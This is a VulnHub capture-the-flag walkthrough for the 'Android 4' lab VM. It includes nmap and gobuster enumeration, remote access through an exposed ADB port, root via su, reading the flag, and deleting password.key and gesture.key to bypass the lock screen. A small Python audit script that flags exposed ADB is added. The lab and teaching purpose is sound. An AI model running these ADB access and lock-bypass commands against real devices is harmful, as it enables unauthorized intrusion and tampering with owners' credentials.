Android 4: 1 || VulnHub Complete Walkthrough


VulnHub - Vulnerable By Design

VulnHub is a platform that hosts intentionally vulnerable machines and web applications for educational and testing purposes. It provides a hands-on learning environment where security enthusiasts can practice identifying and exploiting vulnerabilities.


The box I will be writing up is Android 4.


The setup is quite easy and similar to the previous videos.

  • First, download the ".ova" image.
  • Open VirtualBox.
  • Click Import and browse to the file in the Downloads directory.
  • On completion, check that the Network Adapter is set to Host-only Adapter.

Once the setup is done, let’s start the VM.

The instance is ready, and we are greeted by a UI that asks us for a password. Our task is to find the flag and also to unlock the password screen.


Enumeration

The instance is ready and we are on Kali Linux. Let's find the target's IP address using Netdiscover.

┌─[mrdev@TS]─[~]
└──╼ $ sudo netdiscover -i vboxnet0

 Currently scanning: 192.168.112.0/16   |   Screen View: Unique Hosts                                                              
                                                                                                                                   
 2 Captured ARP Req/Rep packets, from 2 hosts.   Total size: 102                                                                   
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.100  08:00:27:9a:5a:48      1      42  PCS Systemtechnik GmbH                                                          
  192.168.56.108  08:00:27:05:35:56      1      60  PCS Systemtechnik GmbH                                                          

We have discovered the target's IP address, so let's perform a port scan to find out which ports are open, an essential part of the enumeration process. This helps us understand the attack surface and plan targeted tests. As in most cases, we will use the well-known Nmap tool.


Conducting Network Scans with Nmap

  • -sC : Performs a script scan using the default set of scripts.
  • -sV : Enables version detection, which identifies the service and version running on each open port.

┌─[✗]─[mrdev@TS]─[~]
└──╼ $ nmap -sC -sV 192.168.56.108
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-29 16:44 IST
Nmap scan report for 192.168.56.108
Host is up (0.080s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
5555/tcp open  adb     Android Debug Bridge device (name: android_x86; model: VirtualBox; device: x86)
8080/tcp open  http    PHP cli server 5.5 or later
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Deface by Good Hackers
Service Info: OS: Android; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.94 seconds
┌─[mrdev@TS]─[~]
└──╼ $

From the network scan, we have spotted 2 open ports.

  • Port 5555/TCP is listed in Nmap's services file as the Freeciv gaming protocol, but version detection identifies it as the Android Debug Bridge (adb).
  • Port 8080/TCP is running an HTTP service, which indicates that there is a website running.
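As an added example (not part of the original walkthrough), the following Python snippet parses Nmap's normal output, as shown above, and flags an exposed ADB service as a critical finding. The sample text and the severity rules are constructed here for illustration.

```python
import re
from dataclasses import dataclass

# Constructed sample: the port table from the walkthrough's nmap -sC -sV run.
SAMPLE_NMAP = """\
Nmap scan report for 192.168.56.108
Host is up (0.080s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT     STATE SERVICE VERSION
5555/tcp open  adb     Android Debug Bridge device (name: android_x86; model: VirtualBox; device: x86)
8080/tcp open  http    PHP cli server 5.5 or later
|_http-title: Deface by Good Hackers
Service Info: OS: Android; CPE: cpe:/o:linux:linux_kernel
"""

# port/proto  state  service  version...
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

@dataclass
class Finding:
    host: str
    port: int
    service: str
    severity: str
    note: str

def audit_nmap(text):
    """Return one Finding per open port, rating ADB-on-TCP as critical."""
    findings, host = [], None
    for line in text.splitlines():
        m = re.match(r"Nmap scan report for (\S+)", line)
        if m:
            host = m.group(1)
            continue
        m = PORT_RE.match(line)
        if not m or m.group(3) != "open":
            continue
        port, service, version = int(m.group(1)), m.group(4), m.group(5)
        if service == "adb" or "Android Debug Bridge" in version:
            sev, note = "critical", "ADB exposed over the network: remote shell without authentication"
        elif port == 5555:
            # nmap-services maps 5555 to freeciv; only -sV tells ADB apart.
            sev, note = "high", "port 5555 open; confirm with -sV that it is not ADB"
        elif service == "http":
            sev, note = "info", "web service exposed; enumerate its content"
        else:
            sev, note = "low", "open port; review whether the service is needed"
        findings.append(Finding(host, port, service, sev, note))
    return findings
```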

To look at the contents ourselves, we can open a web browser of our choice and navigate to the target's IP address with port 8080 in the URL bar.

Foothold

This seems to be just an information page.

One might suspect some kind of input tampering using the POST method. We tried but didn’t find anything useful.


Discovery of Hidden Directories with Gobuster

Let’s brute force directories and URLs using gobuster.

┌─[✗]─[mrdev@TS]─[~]
└──╼ $ gobuster dir -u http://192.168.56.108:8080 -w /usr/share/wordlists/dirb/common.txt

We found nothing useful in the result.

From the Nmap result, we know that port 5555 is open. After analyzing it, I confirmed that the Android device might be reachable through the ADB command-line utility.


Remotely Accessing Android Devices with ADB

If you don’t know what ADB is:

ADB - Android Debug Bridge

ADB (Android Debug Bridge) is a versatile command-line tool that allows developers to communicate with an Android device from a computer. It enables various debugging and diagnostic tasks, such as installing and debugging apps, accessing the device shell, transferring files, and more.


First, open a terminal and check whether the ADB command-line utility is already installed. If not, install it.

┌─[mrdev@TS]─[~]
└──╼ $ sudo apt-get install adb

To connect to the Android device over the network:

┌─[mrdev@TS]─[~]
└──╼ $ adb connect 192.168.56.108:5555
connected to 192.168.56.108:5555
┌─[mrdev@TS]─[~]
└──╼ $

On successful execution, you can list the connected devices using adb devices. As you can see, we have successfully connected to the target.

┌─[mrdev@TS]─[~]
└──╼ $ adb devices
List of devices attached
192.168.56.108:5555 devices
┌─[mrdev@TS]─[~]
└──╼ $

To interact with the shell, use the adb shell command, where you can run Linux commands to find the flag.

┌─[mrdev@TS]─[~]
└──╼ $ adb shell
uid=2000(shell) gid=2000(shell) groups=1003(graphics),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats)@x86:/ $ 


Privilege Escalation

From the output of the adb shell command, we have obtained a shell as what appears to be a normal, unprivileged user account. To switch to superuser access, run the su command.

uid=2000(shell) gid=2000(shell) groups=1003(graphics),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats)@x86:/ $ su
uid=0(root) gid=0(root)@x86:/ #

We have successfully escalated to the highest privilege. You can now find the root flag to complete the challenge.

uid=0(root) gid=0(root)@x86:/ # cd /data/root
uid=0(root) gid=0(root)@x86:/data/root # ls
flag.txt
uid=0(root) gid=0(root)@x86:/data/root # cat flag.txt
ANDROID{u_GOT_root_buddy}
uid=0(root) gid=0(root)@x86:/data/root #

Congratulations on the completion of capturing the flag.


Bypassing Android Device Lock Screen Security

Let’s see if we can remove the lock screen password using ADB. First, change to the parent directory, which is the data directory.

From there, change into the system directory and list all files and directories.

uid=0(root) gid=0(root)@x86:/data/root # cd ..
uid=0(root) gid=0(root)@x86:/data # cd system
uid=0(root) gid=0(root)@x86:/data/system # ls
appops.xml
batterystats.bin
called_pre_boots.dat
device_policies.xml
dropbox
entropy.dat
framework_atlas.config
gesture.key
ifw
inputmethod
locksettings.db
locksettings.db-shm
locksettings.db-wal
ndebugsocket
netstats
packages.list
packages.xml
password.key
procstats
registered_services
shared_prefs
sync
uiderrors.txt
usagestats
users
uid=0(root) gid=0(root)@x86:/data/system #

The lock-screen keys are stored in the files with the ".key" extension, gesture.key and password.key.

uid=0(root) gid=0(root)@x86:/data/system # cat password.key
68683BEA625263C8F04CBBC88D13233FBD2B6B875C707BC04B48AD1AD1733F739969F9D7 uid=0(root) gid=0(root)@x86:/data/system # 
uid=0(root) gid=0(root)@x86:/data/system # rm *.key     # To remove all password Keys
uid=0(root) gid=0(root)@x86:/data/system # 

The key files are removed. Reboot the device to see the magic.

We have successfully managed to bypass the lock screen.
